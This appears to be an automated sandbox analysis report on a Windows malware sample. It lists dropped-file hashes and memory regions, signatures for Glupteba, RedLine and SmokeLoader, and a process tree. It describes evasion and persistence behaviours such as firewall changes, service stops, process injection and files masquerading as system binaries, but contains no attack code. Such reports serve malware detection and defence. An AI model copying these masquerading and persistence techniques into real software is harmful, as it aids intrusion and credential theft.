SHA512 cb9ed75c14e7b093cabab66c22d412371c639ace31fbe976c71ffec6007bf85b3d7d3e591fe5612e2a035298398d32e1aa7dc0d753f93328ebc2ce8e44fb8d2b

memory/3332-97-0x0000000074B60000-0x0000000075310000-memory.dmp

memory/3332-98-0x00000000008C0000-0x00000000008FC000-memory.dmp

memory/3332-222-0x0000000007B80000-0x0000000008124000-memory.dmp

C:\Program Files (x86)\xrecode3\xrecode3.exe

MD5 f78010ec1b1b0fc490d99e37153f63c4
SHA1 0bdbc334bb31d561089c08265ad9abf01b9c6b45
SHA256 53d084930d001fd11a520d6e00a297c3f9a6193cb10488c1532099558693927b
SHA512 fc1da7f4ed28400797fe554d360aca52a4bb7b1ab84dd94c63eb78dda747170886dfbe18f2f6406ca405ac6cdb9712a21089038a7fe73858e4eeedcdcae510cb

memory/3332-227-0x00000000076B0000-0x0000000007742000-memory.dmp

memory/2864-228-0x0000000000400000-0x0000000000785000-memory.dmp

memory/3332-229-0x0000000007810000-0x0000000007820000-memory.dmp

C:\Program Files (x86)\xrecode3\xrecode3.exe

MD5 97dcf2fb27ebcdeb36af3cef1c1b440f
SHA1 afba2aa1f323cb7224d5b1e47872fb019edc25bc
SHA256 87d2db3824a21bc21e741d4ec927e0e59df70c3e77bb05608341666341f23146
SHA512 1182776fb029603299ee33400a047de253b6c4d390db78227f2757ee1177b22d4df969a39e07a9695418a27a22cbc6c53e1522e29ba77370250a0c9c43ced91f

memory/2864-234-0x0000000000400000-0x0000000000785000-memory.dmp

memory/2864-235-0x0000000000400000-0x0000000000785000-memory.dmp

memory/3332-231-0x0000000007680000-0x000000000768A000-memory.dmp

memory/3332-237-0x0000000008130000-0x000000000823A000-memory.dmp

memory/3332-239-0x00000000077F0000-0x0000000007802000-memory.dmp

memory/3332-241-0x0000000007950000-0x000000000798C000-memory.dmp

memory/3332-244-0x00000000079C0000-0x0000000007A0C000-memory.dmp

memory/436-243-0x0000000000400000-0x0000000000785000-memory.dmp

C:\Program Files (x86)\xrecode3\xrecode3.exe

MD5 87194f3e1ecd0d487eef4352eac49efc
SHA1 b1c24f4cd7d3dfba037813a69d5165a4123ea621
SHA256 60d339210e3548d0ad231f650bdd789fe3ef4e36b6eaf167c607d1504507480f
SHA512 36532d013f1a22b996c4bbfe2dbba3599ac0357fdb68f527963970febb6ba54bda29be2d1e7cec80000c73e74a1618a1ad5ca23721a289055a7015bc61b53253

memory/3332-236-0x0000000008750000-0x0000000008D68000-memory.dmp

C:\ProgramData\SpaceRacesEX\SpaceRacesEX.exe

MD5 6bf48b33a953eb230cea6e47ed76e70d
SHA1 5ad9f155acdcbb917a578ace42593e9e35ad2b53
SHA256 739f64ab20bee915ff250c9c4565629967ab8736b555b8b76572f4ea48c59ce5
SHA512 2b901ef593759e2f55e75eb8c9215a3d7f0a3420424cfa2074bc458ee2ebdb13b7f3f5a55332a1cd6dec945f338392a0e2da8baec2414d720018ef6eb7420453

memory/2864-230-0x0000000000400000-0x0000000000785000-memory.dmp

memory/1912-94-0x0000000000610000-0x0000000000611000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-E9VN6.tmp\tuc3.tmp

MD5 5525670a9e72d77b368a9aa4b8c814c1
SHA1 3fdad952ea00175f3a6e549b5dca4f568e394612
SHA256 1180706added2a7899f08f25a9f88ecff5d003ba8964f918d00779565e4a6978
SHA512 757249f7e67f82522a8e3079a22c5cf92111626446a32ad3ef876f23885f62d1bb5bf3238d564e23531d062fe18742568dfc00e33b049bb8eef05eb953ef981a

C:\Users\Admin\AppData\Local\Temp\Broom.exe

MD5 9acff15b75ed7b1316e371334bdc9267
SHA1 77a2b3a3b88f7c539625936fc9b762165c3f6ba8
SHA256 82a57e3731ac510133074cff92bee3b92c33cea3be660ef485593aa4e7408a61
SHA512 57e07349dae3b93e9c2b8cd087561db7afde03d175fbc2c556865977fe69c3863115c0a7e4bb541b678fd63d3fb64406252729987bd48a1bde3af4128999f450

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 6db9e2efc14c5447008cb3d5bd82ce3a
SHA1 a9a873c9ca2aec4a68c479aa8164fb71f9fdd862
SHA256 3a390df381e49500ac5f14c52aa833ccbf060135f237cf9ee7363e6900ca40de
SHA512 c005f53525234fd53557efd31b5bfe167c68699166765fe7a754ad2a5c4e9d0596b649976e50080b70d034a8eb2b7a55c7d8013a1aaa2864914f4ddcb57cb58b

memory/2312-246-0x0000000000400000-0x0000000000414000-memory.dmp

memory/768-247-0x0000000002970000-0x0000000002D72000-memory.dmp

memory/768-248-0x0000000002D80000-0x000000000366B000-memory.dmp

memory/768-249-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/3088-250-0x0000000000850000-0x0000000000859000-memory.dmp

memory/4712-251-0x0000000000B30000-0x0000000000B31000-memory.dmp

memory/3088-252-0x00000000009E0000-0x0000000000AE0000-memory.dmp

memory/116-256-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1912-254-0x0000000000610000-0x0000000000611000-memory.dmp

memory/116-253-0x0000000000400000-0x0000000000409000-memory.dmp

memory/116-257-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 9380749dd41d8f0f831b3f1121d17572
SHA1 d14f9551bf90de41373042116eb121ca5929a57e
SHA256 9291e0820ef73ccb6d6b36a5e4685a5c84e4e62710f53d3ffdfe97b5fba684b7
SHA512 48de795eb64279361b3005ee0cdd25112c2aaaede8033a4373d65e6d272a23ec248bcb2eb8398939ee5bfdfcaca0627307e4a797d43cc7f2782ea75394aef466

memory/968-258-0x0000000005010000-0x0000000005046000-memory.dmp

memory/3332-260-0x0000000074B60000-0x0000000075310000-memory.dmp

memory/968-259-0x00000000056E0000-0x0000000005D08000-memory.dmp

memory/968-261-0x0000000074B60000-0x0000000075310000-memory.dmp

memory/968-263-0x00000000050A0000-0x00000000050B0000-memory.dmp

memory/968-262-0x00000000050A0000-0x00000000050B0000-memory.dmp

memory/968-264-0x0000000005610000-0x0000000005632000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i1kq1ua0.too.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/968-266-0x0000000005F70000-0x0000000005FD6000-memory.dmp

memory/968-265-0x0000000005E00000-0x0000000005E66000-memory.dmp

memory/968-276-0x00000000060E0000-0x0000000006434000-memory.dmp

memory/968-277-0x00000000065F0000-0x000000000660E000-memory.dmp

memory/968-278-0x0000000006B60000-0x0000000006BA4000-memory.dmp

memory/968-279-0x0000000007920000-0x0000000007996000-memory.dmp

memory/968-280-0x0000000008020000-0x000000000869A000-memory.dmp

memory/968-281-0x00000000079C0000-0x00000000079DA000-memory.dmp

memory/3332-283-0x0000000007810000-0x0000000007820000-memory.dmp

memory/968-285-0x000000006CB20000-0x000000006CE74000-memory.dmp

memory/968-296-0x00000000050A0000-0x00000000050B0000-memory.dmp

memory/968-297-0x0000000007BD0000-0x0000000007C73000-memory.dmp

memory/968-295-0x0000000007BB0000-0x0000000007BCE000-memory.dmp

memory/968-298-0x0000000007CC0000-0x0000000007CCA000-memory.dmp

memory/968-284-0x0000000072430000-0x000000007247C000-memory.dmp

memory/968-299-0x0000000007D80000-0x0000000007E16000-memory.dmp

memory/968-282-0x0000000007B70000-0x0000000007BA2000-memory.dmp

memory/968-300-0x0000000007CE0000-0x0000000007CF1000-memory.dmp

memory/968-301-0x0000000007D20000-0x0000000007D2E000-memory.dmp

memory/968-303-0x0000000007E20000-0x0000000007E3A000-memory.dmp

memory/968-302-0x0000000007D30000-0x0000000007D44000-memory.dmp

memory/968-304-0x0000000007D70000-0x0000000007D78000-memory.dmp

memory/968-307-0x0000000074B60000-0x0000000075310000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 79d91353447f7d43583bf0275a512792
SHA1 f26bdaca906cc1a8f5048abaa733d499e49cdda9
SHA256 f70ac8c3a8b3085cb46e8d5b58f5db992f333d382fc80a86deaba8c033ff507f
SHA512 db307e8b8617368326c778389c614fcfc45212aa6003b7d224dcd97365b94d5e75bad5ff7994587ef38f6f6d52482f83a088cfe07e6b4ebeee0a84a9f3c17201

memory/3260-309-0x0000000002EF0000-0x0000000002F06000-memory.dmp

memory/3332-313-0x0000000009140000-0x0000000009302000-memory.dmp

memory/3332-314-0x0000000009840000-0x0000000009D6C000-memory.dmp

memory/116-315-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4712-318-0x0000000000400000-0x0000000000965000-memory.dmp

memory/768-317-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/1912-321-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/3164-320-0x00007FF77D680000-0x00007FF77DC21000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 536d87c86d902aae4694ba6bb8057b0b
SHA1 0ecdb10d36c5a2ea118efe7d56c6843967fa14e8
SHA256 adf60ac6767fd07bfda24d541c2550dbe93d938f3c15fbda7f7fa7f564ccf51f
SHA512 bed8f1bc76f42db4780b0ac456eb7623656e7ccffecfabbceac0f94937eacb5c5aaeac4b7961a37f46e6b8198ae0a341b12d596e3b5866c5060b82c6c98178fe

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 bac6637ada6f7def8263b9e7fcdeeb95
SHA1 62f520f274d6de9741f4ce7cbf8a67eec7592372
SHA256 b6cd9b2d5ae327a818edb05919fb64e6ef6b17b82837dd3f8bf92bc090a4c313
SHA512 d7c1a52456d5edc6b4c59217f4732dfaae008b0d02c6bc0924c3f23e04accb146296635754048a462a1cf289311b1c9e19e3dccf50c21e7f3ee072465a497b24

C:\Windows\rss\csrss.exe

MD5 6687be7a2fa4234b8a8dfaba4bb94822
SHA1 f242e0708a4d8e5558acffa89efc12f9cd51070a
SHA256 e4f6c27a9587e0f476814a22fae0fca51362c6d25422e0a03d2f09f3ead7b114
SHA512 1c0eb066c8a371fb5a16dba59786f8939ed3eac8948c01c7e32d8351df7567c5cd31df197b6dab48c157349de6c4adfe2125593801cccdec6a1c1f74aea156dd

C:\Windows\rss\csrss.exe

MD5 f138c3ce20c5f41dc2ebc3530f095d97
SHA1 c6b8c623877694c015ccd1f8b9f585c29e5379c8
SHA256 f19b5b82139be23128a36185649760d98ad509a8f1b588c4fdcdc3cffbf2c1b2
SHA512 1b4a343ea53337510d6eddf15e737cf6d40d39a24b338991096db69c736d649fd0e13b47bf51896dd730915a0b4daf49c40e9dda9161a902a1e6d264530d21c3

memory/1704-425-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 fdc591e1449459e405bdf8e508409e7a
SHA1 f425d145067db155bd5a8bef1d79d885c8b39714
SHA256 7a85ec9be3af7ef7e9a32b6d6d15d431e9211ea16e88c246cc1e6d215d55eac5
SHA512 44dc1627b145a8a74788329d423384f0056b4fbdb78490633285c95f43b84eee66897a11b16928d414c55f7e6d2e0abdcb4c9ad75bda0a9b53b990fb42fe397a

memory/436-455-0x0000000000400000-0x0000000000785000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 9d09fc72b4b5beca52593b38171b17e5
SHA1 786ca35bd58ee22c8ea843141a1601bc09cf303d
SHA256 fb22414d0f6ae6b39b172f1c257db4f6e535443841d231945f90b3e5670b11b8
SHA512 a53663e6f0797baf8f10b7ddc5418304f07e96bbbd4e5e237cf86e4c8bea8a01e2b6f55fe35fbc816b0afab8b1ca421cb0310830d2e1926f457950bd6f34fb93

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 511de048744300ffca50086f34876911
SHA1 5855ee21b5f1bbce440252ed4c5c353841ecbcde
SHA256 4675c181bc379d8716b63eb78564f0d8b0ea049d2a4fcb821b448e4042a526ab
SHA512 10e297ca6771a983381e125477b18ca278960d34b15ee03a2a0a19a16ca66638a525600e94b744a06dedc51dac7b6c612258343692dcd88f0685837cc6048cd5

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/4688-528-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Program Files\Google\Chrome\updater.exe

MD5 392316748996c39b597d1aafefc5a267
SHA1 ac1ee4e8d37a5c9e2572ade87aea772e77c6233a
SHA256 a0afee698813e75d99c551cb08603753a9cd951fca8590e099a09af9d8ae3b0b
SHA512 f401e8f5d504b26b9f1b65fca5e46c59f8c020b17c4ea95d989c183ab9fe86444808804bb75f94b676c5ea979dfdef050ffde38a3bc83add4188d726acc866ca

memory/3164-565-0x00007FF77D680000-0x00007FF77DC21000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 73abe04f6d6c5f45aac88912695eca04
SHA1 8e95811e13a5a2ad2210e7113bacffbf9107ee58
SHA256 01587b9fdb8cd0036c0d402e78df3870ed9c80ee42313846673e9dba3be53cf6
SHA512 15af7ea879933473105297e853180dd0885f584403dec00b70c454adc5eeeb3071fcfe075d7c8ac6bdce56490d6a66deae5a505312eff606522405739b2537e0

memory/436-570-0x0000000000400000-0x0000000000785000-memory.dmp

C:\Windows\windefender.exe

MD5 764d564e6a2939edcd488b08e64d21a6
SHA1 86c133e2e777d3f6d1debaa16561a74483e5f481
SHA256 a1301d970b4a4062190c6f473b46b5f70d8cc034aea91da0d099a1c6d9cc8cda
SHA512 328585c6d4954264597fc6b5b448cdbae40daa28d22efe0b7519d24893eadf85e3c29753a059c7a2be4831741534f13eb7518856326cf9b1a762cfd0820c53fc

C:\Windows\windefender.exe

MD5 20ca3ce63e4480010e83f471f9cfe051
SHA1 80650ed1253bfb74b5a5e0a7b6cbcdafb15e9504
SHA256 f432ab5182cf1ba7e3bb118ae0a023eb7fe43dd9164258c9d1bd628a4f60c99e
SHA512 d152b7e69cc248f179cdd55d090cda120b4c08b559fcfc683bb7019cca36da4aa450246080f74ee4ffe9aed31cb90613bb28262ca5fc6ec7e3495919f9574a7e

C:\Windows\windefender.exe

MD5 d0cdb1635765dd73baa02238f037c118
SHA1 91b7c804025805e17544c03d578dbb2a54aa3fab
SHA256 b19d6d0908b21c759f341d11b3f2d0f770db66683246a0a2edbb8ff7815ccded
SHA512 40df98b0d5d86a24f05a50fb7e4b5a4a35bcf29cd735935059c14fd9ea307322b6f93901cedc07f8225e0762353c72903d804f3d059be2bec99e835bc3aa7ed8

memory/3420-578-0x0000000000400000-0x00000000008DF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F192.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155

memory/4688-588-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/436-593-0x0000000000400000-0x0000000000785000-memory.dmp

memory/3760-594-0x00007FF6FADB0000-0x00007FF6FB351000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\E63.exe

MD5 e95bb6836f66491c243adc56f70435d9
SHA1 3440f0759e967f576006c9db86fbdf61ad6f8ed1
SHA256 1beb16fb81436290008041e9090018e2215550d050c46fd4273f4b5338de1211
SHA512 70495e02fca292dcd1fd5847c25961c384590a687df009db14d7f1b0591e1d933faa7dc3546a810023d59b0a7eb97ccbacb6d6d6c19b45454423a1498cb08c3c

C:\Users\Admin\AppData\Local\Temp\E63.exe

MD5 2e7b947e83d54e09ded7768f437ebd69
SHA1 04c89a5f39841ac90a7c6aef268ca13fa646a7ec
SHA256 b061680016f0aebf823828995838d77618dab0cf46fcf80fd34520a6f0e2bbaf
SHA512 13c00f21d33deb07b10f73b20afe1b3fd1848fb615c5c069bf2660a861165d5099fd5b6da213cd0f0d5104781efc337e79259b43fad55968a270fb8c902ee464

memory/3700-595-0x0000000000650000-0x000000000068C000-memory.dmp

memory/4688-614-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/1980-615-0x0000000000400000-0x00000000008DF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1D29.exe

MD5 d074429526d0cea8175c328dfd7dfb6e
SHA1 0e5125abfdfda7f2f63547e2779535252d55d560
SHA256 73bb85b2eb1c6324fca7c53663e5cff3baa62f10aab20ba8f188fa3b03c820bb
SHA512 568315c4816ade03b7c2fb675f0a49ab33622e8870bbe8bc74a8ffa213705c65808a004be7c50ced54afdadf3cf50e968afde399c77cb06d386414e64dc2decd

C:\Users\Admin\AppData\Local\Temp\1D29.exe

MD5 31437c1d673773e143f51355a2b1640a
SHA1 8d99a5d4a9aafc3e2a349ca661add885f3339653
SHA256 511c583a578f60d99c6ac29d379baa8c7c76dd31c1c3443d527554ca67863c8c
SHA512 37a8bf70178fba5082962e627ae0b3bb4dac5817676ea0333cd9dcd21da383288406d8b844c989f9c165b4a97f2ba13a2d7fa42d0c6d5e79b4aa00207b31c962

memory/436-624-0x0000000000400000-0x0000000000785000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

MD5 e7e93c800f74b84706a6cf60844e8e03
SHA1 24fa13318c0393f37d632e41cf7eebf4ed1cf826
SHA256 80e2132f3e5b995b1128cb69991f0f02f01fb5b9323cf9b275b3b71b98805b46
SHA512 bbc9367dba2618c5ffb4f20a301d4637e9326d42786472eb034b71a12be83635c70f8d4779ff454aa5c91ae63fd191ef90f17d60bb98bba358530bc287faa6b6

memory/3164-638-0x0000000000400000-0x000000000047E000-memory.dmp

memory/3164-640-0x0000000000400000-0x000000000047E000-memory.dmp

memory/3164-644-0x0000000000400000-0x000000000047E000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b42c70c1dbf0d1d477ec86902db9e986
SHA1 1d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA256 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA512 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 bdb25c22d14ec917e30faf353826c5de
SHA1 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256 e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512 b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

C:\Windows\System32\drivers\etc\hosts

MD5 00930b40cba79465b7a38ed0449d1449
SHA1 4b25a89ee28b20ba162f23772ddaf017669092a5
SHA256 eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512 cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

C:\Program Files\Google\Chrome\updater.exe

MD5 1c6c5c49d2bbb6f245f22b9e2c9bb9b0
SHA1 152e7e42f07bf0853c32239ef4867a4a3ff17ec7
SHA256 4b3805db265a263e62c82af3f283485fe92ffc67223a49b76900f98d0e94d702
SHA512 1c6c7bd3f1111e4e84c62bafbf9d377397b6e6bbd5a874c1431516d880dd2f89b862f49721c74b7aeebaead9db6ce86a8bf5dbf02d15cbabc902bcfbac3ff273

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-11 09:20

Reported

2023-12-11 09:23

Platform

win7-20231023-en

Max time kernel

70s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\C31.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B424.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B962.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1220 wrote to memory of 2080 N/A N/A C:\Users\Admin\AppData\Local\Temp\C31.exe
PID 1220 wrote to memory of 2080 N/A N/A C:\Users\Admin\AppData\Local\Temp\C31.exe
PID 1220 wrote to memory of 2080 N/A N/A C:\Users\Admin\AppData\Local\Temp\C31.exe
PID 1220 wrote to memory of 2080 N/A N/A C:\Users\Admin\AppData\Local\Temp\C31.exe
PID 1220 wrote to memory of 2532 N/A N/A C:\Users\Admin\AppData\Local\Temp\B424.exe
PID 1220 wrote to memory of 2532 N/A N/A C:\Users\Admin\AppData\Local\Temp\B424.exe
PID 1220 wrote to memory of 2532 N/A N/A C:\Users\Admin\AppData\Local\Temp\B424.exe
PID 1220 wrote to memory of 2532 N/A N/A C:\Users\Admin\AppData\Local\Temp\B424.exe
PID 1220 wrote to memory of 2560 N/A N/A C:\Users\Admin\AppData\Local\Temp\B962.exe
PID 1220 wrote to memory of 2560 N/A N/A C:\Users\Admin\AppData\Local\Temp\B962.exe
PID 1220 wrote to memory of 2560 N/A N/A C:\Users\Admin\AppData\Local\Temp\B962.exe
PID 1220 wrote to memory of 2560 N/A N/A C:\Users\Admin\AppData\Local\Temp\B962.exe

Processes

C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe

"C:\Users\Admin\AppData\Local\Temp\0x00070000000146ff-113.exe"

C:\Users\Admin\AppData\Local\Temp\C31.exe

C:\Users\Admin\AppData\Local\Temp\C31.exe

C:\Users\Admin\AppData\Local\Temp\B424.exe

C:\Users\Admin\AppData\Local\Temp\B424.exe

C:\Users\Admin\AppData\Local\Temp\B962.exe

C:\Users\Admin\AppData\Local\Temp\B962.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\is-3EGTU.tmp\tuc3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3EGTU.tmp\tuc3.tmp" /SL5="$B0016,8423542,54272,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Windows\system32\makecab.exe

